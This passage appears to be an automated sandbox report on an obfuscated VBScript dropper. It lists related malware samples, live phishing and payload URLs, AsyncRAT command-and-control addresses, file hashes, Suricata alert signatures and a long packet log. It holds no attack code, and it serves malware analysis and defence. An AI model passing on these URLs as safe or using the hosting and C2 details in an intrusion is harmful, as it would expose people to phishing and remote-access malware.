	http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jg	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	https://dvs.ntoinetted.com/kJthYXSER3TmsdtC7bAT5eXqQ/#geir@byggernfauske.no	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	Translink_rishi.vasandani_Advice81108.pdf	Get hash	malicious	Unknown	Browse	199.232.210.172
	bWrRSlOThY.exe	Get hash	malicious	AsyncRAT, Neshta	Browse	199.232.210.172
	https://www.dropbox.com/l/scl/AADL_v5DzsoHwkyegIhk6J0bQm3A7UWklCA	Get hash	malicious	Unknown	Browse	199.232.214.172
paste.ee	vr65co3Boo.vbs	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer	Browse	188.114.97.3
	qiEmGNhUij.vbs	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer	Browse	188.114.96.3
	asegurar.vbs	Get hash	malicious	Remcos	Browse	188.114.97.3
	dcsegura.vbs	Get hash	malicious	AsyncRAT, DcRat	Browse	188.114.97.3
	asegura.vbs	Get hash	malicious	Remcos	Browse	188.114.97.3
	RFQ-5120240930 VENETA PESCA SRL.vbs	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	sostener.vbs	Get hash	malicious	Remcos, PureLog Stealer	Browse	188.114.97.3
	asegurar.vbs	Get hash	malicious	Remcos, PureLog Stealer	Browse	188.114.97.3
	hnvc.vbs	Get hash	malicious	PureLog Stealer	Browse	188.114.97.3
	wm.vbs	Get hash	malicious	PureLog Stealer, XWorm	Browse	188.114.96.3
ia600100.us.archive.org	vr65co3Boo.vbs	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer	Browse	207.241.227.240
	f4576JaIo9.vbs	Get hash	malicious	PureLog Stealer	Browse	207.241.227.240
	89SkYNNpdi.vbs	Get hash	malicious	AveMaria, PrivateLoader, PureLog Stealer	Browse	207.241.227.240
	qiEmGNhUij.vbs	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer	Browse	207.241.227.240
	ZJbugHcHda.vbs	Get hash	malicious	PureLog Stealer	Browse	207.241.227.240
	0BO4n723Q8.vbs	Get hash	malicious	PureLog Stealer	Browse	207.241.227.240
	PofaABvatI.vbs	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	207.241.227.240
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtf	Get hash	malicious	PureLog Stealer	Browse	207.241.227.240
	RFQ 2024.09.26-89 vivecta.vbs	Get hash	malicious	PureLog Stealer	Browse	207.241.227.240
	AGMETIGA zapytanie ofertowe.xls	Get hash	malicious	PureLog Stealer	Browse	207.241.227.240

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
INTERNET-ARCHIVEUS	vr65co3Boo.vbs	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer	Browse	207.241.227.240
	f4576JaIo9.vbs	Get hash	malicious	PureLog Stealer	Browse	207.241.227.240
	89SkYNNpdi.vbs	Get hash	malicious	AveMaria, PrivateLoader, PureLog Stealer	Browse	207.241.227.240
	qiEmGNhUij.vbs	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer	Browse	207.241.227.240
	ZJbugHcHda.vbs	Get hash	malicious	PureLog Stealer	Browse	207.241.227.240
	0BO4n723Q8.vbs	Get hash	malicious	PureLog Stealer	Browse	207.241.227.240
	PofaABvatI.vbs	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	207.241.227.240
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtf	Get hash	malicious	PureLog Stealer	Browse	207.241.227.240
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf	Get hash	malicious	Remcos	Browse	207.241.227.96
	RFQ 2024.09.26-89 vivecta.vbs	Get hash	malicious	PureLog Stealer	Browse	207.241.227.240
CLOUDFLARENETUS	vr65co3Boo.vbs	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer	Browse	188.114.97.3
	89SkYNNpdi.vbs	Get hash	malicious	AveMaria, PrivateLoader, PureLog Stealer	Browse	162.159.140.237
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.184.196
	qiEmGNhUij.vbs	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer	Browse	188.114.96.3
	PofaABvatI.vbs	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	162.159.140.237
	mitec_purchase_order_PDF (1).vbs	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	172.66.0.235
	http://lamourskinclinic.com.au	Get hash	malicious	Unknown	Browse	104.18.10.207
	https://unpaidrefund.top/view/mygov	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	payment copy.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	DHL Shipping documents 0020398484995500.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
GOOGLE-PRIVATE-CLOUDUS	vr65co3Boo.vbs	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer	Browse	148.113.165.11
	qiEmGNhUij.vbs	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer	Browse	148.113.165.11
	https://bit.ly/4eqfXtg	Get hash	malicious	Unknown	Browse	67.199.248.11
	http://mutaksmklogns.godaddysites.com/	Get hash	malicious	Unknown	Browse	67.199.248.11
	https://solanadefimainnet.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	148.113.153.93
	http://www.card.xn--6qq986b3xl/higgs-domino/	Get hash	malicious	Unknown	Browse	67.199.248.10
	https://smallpdf.com/sign-pdf/document#data=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJodHRwczovL2VzaWduLnNtYWxscGRmLXN0YWdpbmcuY29tIiwic3ViIjoiNjE3MmQyMzMtODcyNy00M2NhLWI1NjQtYjgwZDUyZjYxYmVjIiwiYXVkIjpbImVzaWduIl0sImV4cCI6MTcyODYzODEyMCwibmJmIjoxNzI3NDI4NTIwLCJpYXQiOjE3Mjc0Mjg1MjAsImp0aSI6IjYxNzJkMjMzLTg3MjctNDNjYS1iNTY0LWI4MGQ1MmY2MWJlYyIsInBheWxvYWQiOnsiZW52ZWxvcGVfaWQiOiI2ZWRlMzFjZS00Mzc2LTQwYzItYjJjNy1jMDc2Y2M3MjY4NjIiLCJzaWduX3JlcXVlc3RfaWQiOiI2MTcyZDIzMy04NzI3LTQzY2EtYjU2NC1iODBkNTJmNjFiZWMiLCJ0b2tlbl90eXBlIjoibm90aWZpY2F0aW9uIiwidXNlcl9lbWFpbCI6ImNoYW8ud3VAd3JpLm9yZyIsInVzZXJfZmlyc3RuYW1lIjoiY2hhby53dUB3cmkub3JnIiwidXNlcl9sYXN0bmFtZSI6ImNoYW8ud3VAd3JpLm9yZyJ9fQ.UX67GiHBKgjV8XyH-SFTt_KgB2I_q2j9cbGTSqbzRvY&eid=6ede31ce-4376-40c2-b2c7-c076cc726862&esrt=6172d233-8727-43ca-b564-b80d52f61bec	Get hash	malicious	Unknown	Browse	148.113.163.217
	http://matamesklinog.godaddysites.com/	Get hash	malicious	Unknown	Browse	67.199.248.11
	https://secure.rpcthai.com/	Get hash	malicious	Unknown	Browse	148.113.153.94
	https://onlyclips.site/?title=quinnfinite&ref=git	Get hash	malicious	Unknown	Browse	148.113.153.94

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	aK7smea2Vv.vbs	Get hash	malicious	PureLog Stealer	Browse	207.241.227.240 188.114.96.3
	vr65co3Boo.vbs	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer	Browse	207.241.227.240 188.114.96.3
	f4576JaIo9.vbs	Get hash	malicious	PureLog Stealer	Browse	207.241.227.240 188.114.96.3
	WW8kzvnphl.vbs	Get hash	malicious	Unknown	Browse	207.241.227.240 188.114.96.3
	89SkYNNpdi.vbs	Get hash	malicious	AveMaria, PrivateLoader, PureLog Stealer	Browse	207.241.227.240 188.114.96.3
	qiEmGNhUij.vbs	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer	Browse	207.241.227.240 188.114.96.3
	2THp7fwNQD.vbs	Get hash	malicious	Unknown	Browse	207.241.227.240 188.114.96.3
	iJEK0xwucj.vbs	Get hash	malicious	Unknown	Browse	207.241.227.240 188.114.96.3
	ZJbugHcHda.vbs	Get hash	malicious	PureLog Stealer	Browse	207.241.227.240 188.114.96.3
	0BO4n723Q8.vbs	Get hash	malicious	PureLog Stealer	Browse	207.241.227.240 188.114.96.3

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.237197333704124
Encrypted:	false
SSDEEP:	6:kK09UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:/DImsLNkPlE99SNxAhUe/3
MD5:	B71B36FB93FD0CA8DD3BEDC2CAFC7B79
SHA1:	9823C93895CED3D8076164DCA39AA21659A34553
SHA-256:	695337A9DBF37C3D1D1069042C5DD089CC21139F0D223DB95C99D25519BBC860
SHA-512:	095568737D73BF08E75B0615A15C73BACE0FBBB2DBFDED50112373F2C769FD7065FBB7576928D1B27455382BA190224F9F12DFCC13A8221FDD7548AE41B033F9
Malicious:	false
Reputation:	low
Preview:	p...... ........)1."{...(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllulv4iZ:NllUg
MD5:	70F8065256CFB7FD75CA2A8F72BA3FA4
SHA1:	5A09385998FD735B5E5BD54F5901F3B180363A57
SHA-256:	F5DCDC55A3BF26D5E74BE7BA34D146984239C1CF7859C598B2B5A7C1A912755B
SHA-512:	CE4EEEC66F3553833690F46A08D17D9165D733753A2629998961A19EE57B94CF78961B1C3A0364434A943FF6DC964C5D15233224E8CC4E62507EA792313CC5D4
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................~..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4c1vj0if.ura.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aautp4qn.m2t.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bwhtzndv.3q1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5lhbtdz.hqo.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Entropy (8bit):	3.7696553997914846
TrID:	Text - UTF-16 (LE) encoded (2002/1) 64.44% MP3 audio (1001/1) 32.22% Lumena CEL bitmap (63/63) 2.03% Corel Photo Paint (41/41) 1.32%
File name:	1iH5ABLKIA.vbs
File size:	194'820 bytes
MD5:	a992cf1046f493363298d5afb9caa0fe
SHA1:	45655954dbcb8526284b0227728425d240dc2269
SHA256:	524b71c4013215761e79452ecd84fecf4ee101bd2011d2d95e604a566db996af
SHA512:	524425e8e0faa766ba90311ec2b74797023a5a173c353014b227026784717533dca8a3c10edb855b3fb5ae6acb83580b737471a140997fe34f9d265df9b280c2
SSDEEP:	3072:tCqWL6Dgt5pSGwEXy73+eoUZ34mCt0Jwz0iOiIb8FSfPzWL4SSlb34ZGzftS:tPo+At0JwCC4O4PoorE
TLSH:	6C14034136EB7008F1F76F565AF956A94F7BB9652A3A811D204C170E0BE3E80CE61B73
File Content Preview:	......L.c.W.o.c.T.o.c.b.s.L.T.S.m.W.G.u.m.b.N.p.W.m.L.c.p.d.L.K.L.c.i.i.o.b.z.R.L.G.i.W.O.B.O.W.S.K.T.p.W.B.c.z.h.k.m.z.W.q.e.n.q.G.u.G.e.N.e. .=. .".K.j.Z.b.U.b.B.L.L.c.R.c.c.i.L.b.f.W.i.L.g.L.N.f.e.C.L.f.N.o.Z.s.i.l.A.b.s.q.i.i.T.d.a.P.K.b.L.t.t.L.q.L.h

File Icon


Icon Hash:	68d69b8f86ab9a86

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-02T05:28:20.027735+0200	2841075	ETPRO MALWARE Terse Request to paste .ee - Possible Download	1	192.168.2.6	49713	188.114.96.3	443	TCP
2024-10-02T05:28:20.180666+0200	2020424	ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1	1	188.114.96.3	443	192.168.2.6	49713	TCP
2024-10-02T05:28:23.150330+0200	2842478	ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)	1	148.113.165.11	3236	192.168.2.6	49714	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 05:28:16.075726032 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:16.075773001 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:16.075861931 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:16.084398031 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:16.084414959 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:16.683928013 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:16.684025049 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:16.687428951 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:16.687448978 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:16.687728882 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:16.695626020 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:16.743413925 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:16.971752882 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:16.971776009 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:16.971790075 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:16.971910000 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:16.971940041 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:16.971992016 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:16.992803097 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:16.992825031 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:16.992930889 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:16.992955923 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:16.993026018 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.038795948 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.038816929 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.038913965 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.038932085 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.038971901 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.038990021 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.078690052 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.078712940 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.078824043 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.078843117 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.078887939 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.080781937 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.080799103 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.080893993 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.080903053 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.080948114 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.081885099 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.081901073 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.081957102 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.081964970 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.082006931 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.083794117 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.157998085 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.158019066 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.158083916 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.158106089 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.158135891 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.158154011 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.188227892 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.188246012 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.188359976 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.188380003 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.188426971 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.189457893 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.189474106 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.189526081 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.189533949 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.189553022 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.189573050 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.190269947 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.190287113 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.190323114 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.190330029 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.190356970 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.190377951 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.191795111 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.191814899 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.191854954 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.191863060 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.191874027 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.191896915 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.232827902 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.232846975 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.233056068 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.233076096 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.233135939 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.261914015 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.261934042 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.262017012 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.262033939 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.262073994 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.314352036 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.314371109 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.314461946 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.314477921 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.314516068 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.314850092 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.314866066 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.314924002 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.314933062 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.314980030 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.315531015 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.315548897 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.315586090 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.315593004 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.315623045 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.315633059 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.316144943 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.316160917 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.316224098 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.316231012 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.316293001 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.319257975 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.319276094 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.319334984 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.319344044 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.319408894 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.319829941 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.319847107 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.319888115 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.319897890 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.319927931 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.319957972 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.348983049 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.349004984 CEST	443	49711	207.241.227.240	192.168.2.6
